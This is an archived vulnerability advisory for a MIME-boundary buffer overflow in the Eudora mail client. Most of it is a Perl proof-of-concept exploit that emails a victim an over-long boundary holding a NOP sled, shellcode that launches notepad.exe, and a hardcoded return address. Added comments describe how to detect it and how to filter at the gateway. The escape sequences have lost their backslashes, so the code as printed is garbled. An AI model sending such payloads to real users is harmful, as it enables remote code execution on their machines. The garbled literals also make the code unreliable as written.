source: http://www.securityfocus.com/bid/5397/info
A buffer overflow vulnerability has been reported in Qualcomm's Eudora mail client for Windows systems. The condition occurs if a MIME multipart boundary is of excessive length. Remote attackers may exploit this vulnerability to execute arbitrary code.
#!/usr/local/bin/perl
#---------------------------------------------------------------------
# Eudora Version 5.0.2-Jr2 exploit for Japanese Windows 2000 Pro (SP2)
# written by Kanatoko <[email protected]>
# http://www.jumperz.net/
#---------------------------------------------------------------------
use Socket;
# Target settings for the proof of concept: the SMTP server the script talks
# to, plus the envelope (MAIL FROM / RCPT TO) and header (From / To) addresses.
# Envelope and header values are configured separately.
$connect_host = 'mail.jumperz.net';
$port = 25;
$env_from = '[email protected]';
$env_to = '[email protected]';
$from = '[email protected]';
$to = '[email protected]';
# Resolve the host and open a plain TCP connection to it; each step aborts the
# script on failure.
# NOTE(review): the die messages end in a bare "n" ("Error.n"), which looks
# like an escape altered during page extraction; kept as archived.
$iaddr = inet_aton($connect_host) || die "Host Resolve Error.n";
$sock_addr = pack_sockaddr_in($port,$iaddr);
socket(SOCKET,PF_INET,SOCK_STREAM,0) || die "Socket Error.n";
connect(SOCKET,$sock_addr) || die "Connect Errorn";
# Turn on autoflush for SOCKET, then make STDOUT the default output handle
# again, so each SMTP command is sent as soon as it is printed.
select(SOCKET); $|=1; select(STDOUT);
# Builds $buf, the string that is later placed in the MIME "boundary"
# parameter of the Content-Type header.
# NOTE(review): string escapes in this archived copy appear altered by
# extraction; every literal below is left exactly as the page shows it.
#
# Defender's view: the vulnerable condition described for this advisory is an
# excessively long multipart boundary. RFC 2046 limits a boundary to 70
# characters, and the string assembled here is far longer than that, so a mail
# gateway or MTA content filter that rejects or quarantines messages whose
# boundary parameter exceeds 70 characters covers this case regardless of the
# bytes inside it.
#
#egg written by UNYUN (http://www.shadowpenguin.org/)
#57bytes
# Per the author's note above, $egg is third-party code; the last piece
# appended to it is the literal program name "notepad.exe".
$egg = "xEBx27x8Bx34x24x33xC9x33xD2xB2";
$egg .= "x0Bx03xF2x88x0Ex2BxF2xB8xAFxA7";
$egg .= "xE6x77xB1x05xB2x04x2BxE2x89x0C";
$egg .= "x24x2BxE2x89x34x24xFFxD0x90xEB";
$egg .= "xFDxE8xD4xFFxFFxFF";
$egg .= "notepad.exe";
# $buf = 121 repetitions of a filler string, then $egg, then the trailer
# pieces annotated by the author below.
$buf = "x90" x 121;
$buf .= $egg;
$buf .= "xEBxA0"; #JMP -0x60
$buf .= "A" x 2;
# The author's comment ties this value to one address inside user32.dll; the
# file header names a single platform (Japanese Windows 2000 Pro SP2), so the
# constant is presumably specific to that build -- not verifiable from here.
$buf .= "x97xACxE3x77"; #0x77e3ac97 JMP EBX in user32.dll
# SMTP dialogue: greeting, HELO, MAIL FROM, RCPT TO, DATA, message, QUIT.
# After every step one line of the server's reply is read into $hoge and then
# ignored -- no status code is checked, so the script keeps sending even if
# the server rejects a command.
$hoge = <SOCKET>;
print SOCKET "HELO hogex0Dx0A";
$hoge = <SOCKET>;
print SOCKET "MAIL FROM:<$env_from>x0Dx0A";
$hoge = <SOCKET>;
print SOCKET "RCPT TO:<$env_to>x0Dx0A";
$hoge = <SOCKET>;
print SOCKET "DATAx0Dx0A";
$hoge = <SOCKET>;
# The message itself is a header block only: MIME-Version, From, To and a
# multipart/mixed Content-Type whose boundary parameter is $buf, followed by
# an empty line and the lone "." that ends the DATA phase.
# For detection, this header is the observable artifact: a Content-Type line
# with an over-length boundary value (RFC 2046 allows at most 70 characters)
# arriving in otherwise body-less mail. Inspecting that parameter at the
# gateway, before delivery to the mail client, is the place to stop it.
print SOCKET << "_EOD_";
MIME-Version: 1.0x0D
>From: $fromx0D
To: $tox0D
Content-Type: multipart/mixed; boundary="$buf"x0D
x0D
.x0D
_EOD_
# Read the server's response to the submitted message, then close the session.
$hoge = <SOCKET>;
print SOCKET "QUITx0Dx0A";
$hoge = <SOCKET>;